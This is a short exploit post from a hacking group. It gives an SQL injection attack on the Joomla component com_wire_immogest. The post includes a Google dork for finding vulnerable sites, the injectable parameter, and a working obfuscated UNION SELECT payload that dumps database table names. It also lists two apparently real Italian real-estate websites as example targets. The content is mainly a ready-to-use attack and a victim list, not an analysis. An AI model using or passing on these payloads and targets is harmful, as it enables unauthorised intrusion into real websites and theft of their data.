**************************************************
IIIIIIII  RRRRRRRRRRRR        HHHHHHHH    HHHHHHHH
  IIII      RRRR    RRRR        HHHH        HHHH  
  IIII      RRRR      RRRR      HHHH        HHHH  
  IIII      RRRR      RRRR      HHHH        HHHH  
  IIII      RRRR    RRRR        HHHH        HHHH  
  IIII      RRRRRRRRRR          HHHHHHHHHHHHHHHH  
  IIII      RRRR  RRRR          HHHH        HHHH  
  IIII      RRRR  RRRR          HHHH        HHHH  
  IIII      RRRR    RRRR        HHHH        HHHH  
  IIII      RRRR      RRRR      HHHH        HHHH  
IIIIIIII  RRRRRRRR    RRRRRR  HHHHHHHH    HHHHHHHH
***************************************************

# Exploit Title: Joomla com_wire_immogest SQL Injection vulnerabilities

# Google Dork: inurl:index.php?option=com_wire_immoges   or   allinurl:index.php?option=com_wire_immoges

# Date: 2014

# Exploit Author: MR.XpR

# Tested on: 7 , Kali

# CVE : OSVDB-ID: 87868

# Screen Shot : http://cld.persiangig.com/cfs/rest/documents/39410/preview?size=large

***************************************************

Exploit : 

index.php?option=com_wire_immogest&view=object&id=[sqli]

Injetion Demo : 

http://www.victim.com/index.php?option=com_wire_immogest&view=object&id=999++/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,/*!table_name*/,4,5,6,7+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/--+

Example Site :

http://www.immobiliareoikia.it/index.php?option=com_wire_immogest&view=object&id=3%27
http://www.subitoecasa.it/index.php?option=com_wire_immogest&view=object&id=1163%27


***************************************************

TnX To :

MojiRider,V30sharp,Black.viper,Zer0killer,SecretWalker,FarBodEzrail,Amirio,AL1R3Z4,3is@,Mr.a!i,Mr.3ler0n,Irblackhat,inj3ct0r,3inst3in,Remot3r,IRH Member

./IRaNHaCK.org